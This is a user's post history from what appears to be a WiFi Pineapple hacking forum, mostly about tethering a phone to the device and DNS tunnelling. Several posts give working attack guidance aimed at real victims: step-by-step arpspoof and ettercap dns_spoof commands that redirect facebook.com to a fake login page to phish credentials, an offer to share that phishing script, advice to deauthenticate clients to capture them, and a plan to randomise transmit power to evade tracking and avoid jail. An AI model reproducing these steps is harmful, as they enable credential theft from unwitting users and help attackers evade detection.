Andrei0427
-
Posts
41 -
Joined
-
Last visited
Posts posted by Andrei0427
-
-
Update: Finally ran out of pre paid credit on my phone.. Pinging google returns an IP but when using dns2tcpc doesnt detect my domain through the DNS even though it returns an IP when pinging it.. im about to try with just the ip..
-
I doubt any form of reaver-WPS is possible on the N900, although I have come across some python scripts that came close, they just had some small issues that made it not work. Im not sure if the author updated them. :P
Id link to the source but it has been a long time since I seen them :/ Although a little googleing should take you to them ;)
Good luck!
Andrei
-
Just a quick update: I have managed to get the DNS tunneling working, aswell as on my N900, just thinking of a way to perform this experiment as I have credit in my account ;P Maybe ill wait till its finished
-
Thanks for the information! I do not have that much knowledge regarding the OpenWRT platform and how it works as regards treating USB devices.
Just a question.. once you have the usb0 interface, did you give it an IP, defaultGW on both the phone and pineapple? And if so are they pingable with each other?
If you achieved this step I imagine a couple of iptables rules and it should work. Not forgetting ip_forwarding of course :)
Thanks again, would really like to see this idea work as it would eliminate the laptop in it's usage.
-
To be honest, I haven't tried it yet. I plan to do so soon
-
I already posted a question but it seemed to be for a specific device so I decided to collect what I think a bunch of 'variables' that should help me to tether internet to the pineapple from my phone. Here we go :):
1) Is it possible to change the default SSID from pineapple to something else upon start up?
2) [!] Is it normal for the Karma log to list clients what have disconnect too? <Maybe it is not updating?>
3) Is is possible to bring the USB0 interface up / configure it manually using ifconfig usb0 172.16.42.1? IE changing the default gateway IP from the PoE/LAN interface to the USB? If so, how is this achieved?
4) Furthermore, considering I plan to use my phone as an internet provider, will the gateway be the pineapple? Since its providing the DHCP or the phone since its providing internet?
Having said that is sharing the SDCard on the phone to the pineapple?
Sorry for all the questions but I have big plans for this if all of the above is possible.
Regards,
Andrei
-
Ive managed in the past to utilise the N900 in order to act as a USB wireless modem for my laptop when Im in dire need of battery life, I was thinking and wondering if this is possible with the Pineapple? Having this convenience will greatly improve concealing the device as SSHing to the pineapple can easily be done, and providing internet makes it all the better!
I have already attempted this but had no luck getting the usb0 interface up <I dont even know what its called xD> Although my N900 has the capability to set a default GW, and its own IP address to the usb0 interface, in addition to echoing '1' to ip_forward. Has anyone managed or has the knowledge to accomplish this task?
I know for certain that it's easier than having a 3G modem attached to it config. wise. All I need to know is how can I at least ping my phone through it's 172.16.42.42 IP from the pineapple, although further guidance is appreciated :).
Regards,
Andrei
-
If I understood your question, you cant deauth and use karma on the same interface, you will need a laptop or mobile to do the deauth
-
try using winSCP, its got a nice gui to it too ;)
Good luck
-
You need to echo 1 into the ip_forward.
Also, try type arp -a into a cmd in windows and check if the MAC of the default gateway matches your 'attack' pc.
-
Just use mdk3, Ive been having problems myself with AirDrop-ng couldnt find a solution
-
Yes, using mdk3's ('d' function) on a seperate device and loading a whitelist to remove the pineapple's BSSID :)
-
Make sure the AP's saved on your android phone are set to connect automatically when it's in range. Other than that I dont know what else can be wrong :/
-
Clients will need to be probing for a connection in order for karma to pick them up, if theyre connected to a network already they wont be probing so it wont work.
Try a de authentication attack to one of them if you do not have physical access to them <Illegal> and see if it works.
-
Sure, would save me some time too to figure it all out, Id also love to see other ways to implement this :)
Thanks
-
Note: Since I do not have my pineapple yet, I only can help so much as to websever setup.You probably can use the steps from the RockRolling Pineapple episode to setup the redirection. This is what I did on a laptop running Backtrack:
EDIT: Kinda looks shit on all browsers other than Chrome :/
1) Place contents of: http://www.mediafire.com/?o1t637acat6a116 into /var/www/
2) Append dns_spoof for ettercap with:
facebook.com A webServIP
3) Start up webserver: service apache2 start
4) Run arpspoof <arpspoof -i wlan0 192.168.1.254(GW IP)>
5) Run ettercap with:
ettercap -Tqi wlan0 -P dns_spoof
NB: The etter_dns file will need some searching to find, for some reason it changed when I upgraded distro but its in
/usr/local/share/ettercap/etter.dns
I apologize once again for not being able to provide instructions for the pineapple, although once I learn how to do this on it ill post the new instructions :)
-
The only issue I could see would be any systems that cached the DNS for Facebook
Most of the time yes, it would be cached but if the client has just connected to the network it would refresh the DNS server with your spoofed one. <I imagine you would have this pre-configured with the pineapple>
Have you attempted that with a profile that uses the location aware feature (aka IP address block check for new locations)?
EDIT:
I noticed what you meant with the IP block, that account isn't mine but he logged in from a local network I was in so this didn't matter really :P
Indeed I have and it still works! Facebook probably uses the GeoLocaction of an IP rather than the block to track it, would be a pain to reset your password if you log in from a different ISP but within the same region.
-------------------------------------------------------------------
Im thinking of adding that SSLSniff you mentioned to the log in page to add more validity to it, although its up to the victim to enable SSL on his profile. The only obvious give away is the ping.. I guess theres no way to escape it..
Glad you found it useful :)
-
Video is reuploaded, Ill try play around with that SSLSniff, I thought SSLStrip's favicon would be enough to bypass the security conscious.
-
Wow, already taken down.. Ill reupload with no music.. one sec
Edit: It shouldnt matter, your victim is entering his credentials using your non-HTTPS page then redirected to the real facebook
-
I was playing around with a phishing script I had made some time ago with PHP and noticed that the www.facebook.com AND facebook.com are treated differently with ettercap's DNS_SPOOF filter. So I setup the script to forward to www.facebook.com whist having the DNS spoofed on facebook.com only. This will cause an automatic redirection to the user's real profile.
This only works if the victim types "facebook.com" in the address bar, so the probability of this working is slightly slimmed down. Obviously this will only work if the user has a 'remember me' ticked on the computer beforehand, which is mostly the case.
Heres a vid. demo..
I can post the source/method here upon request :)
-
Im wondering if it's possible to directly tether a phone to the pineapple, I managed with a laptop by just modifying the DNS servers and setitng the default GW and a static IP for the machine.. the rest is set up on the phone.. has anyone managed to do this?
I own an N900 by the way
-
thanks for that,i was looking at the trent portable battery pack. i do know it is usb, so thats about 5v output with 11kmAH. Does anyone have any thoughts of it?
amazon.co.uk/New-Trent-iCruiser-IMP1000-Blackberry/dp/B004CHMP50/ref=sr_1_1?ie=UTF8&qid=1330873983&sr=8-1
Sorry for going offtopic bdw
-
Have you tried the association plus setting a static channel using "-c 11" ? If that still doesnt work I dont really know what to suggest.. maybe make sure no external tools are using the wlan interface because they maybe causing the channel change
-
very nice compilation, telot! Would love to see battery and power related things added! Still waiting on my pineapple as I live in europe and it takes a while to get here, cant wait to apply all that i learnt and try stuff out. Anyways, good read and hope to seefurther expansion :) Deffinitely going in my bookmarks.
Better Safe Than Sorry?
in WiFi Pineapple Mark IV
Posted
I was reading through one of stackexchange's child websites and searched 'wifi pineapple' for kicks to see what would come up. I came across this thread saying that the pineapple's radio transmissions could be easily tracks with some software or specialized hardware as indicate in the thread..
http://security.stackexchange.com/questions/10783/tracking-down-a-rogue-access-point
this got me thinking as how to mitigate it as if one was to get caught, he would face jail time (obviously) much like this scenario:
http://nakedsecurity.sophos.com/2012/07/16/seattle-cybercrime-trio-sentenced-for-3m-hacking-spree-via-wifi-and-malware/
Anyways, back to my point.. would be possible to setup a daemon that runs on the pineapple which is simply a bash script randomizing 'iwconfig wlan0 txpower XX' variables and applying them to the interface? At first it seems like the way to go but im not too sure about having the pineapple's cpu and interface hard at work the whole time changing the transmit power.
Any thoughts on this? I can imagine that this could be easily created as an plugin, or 'infusions' as we call them here :)
Regards,
Andrei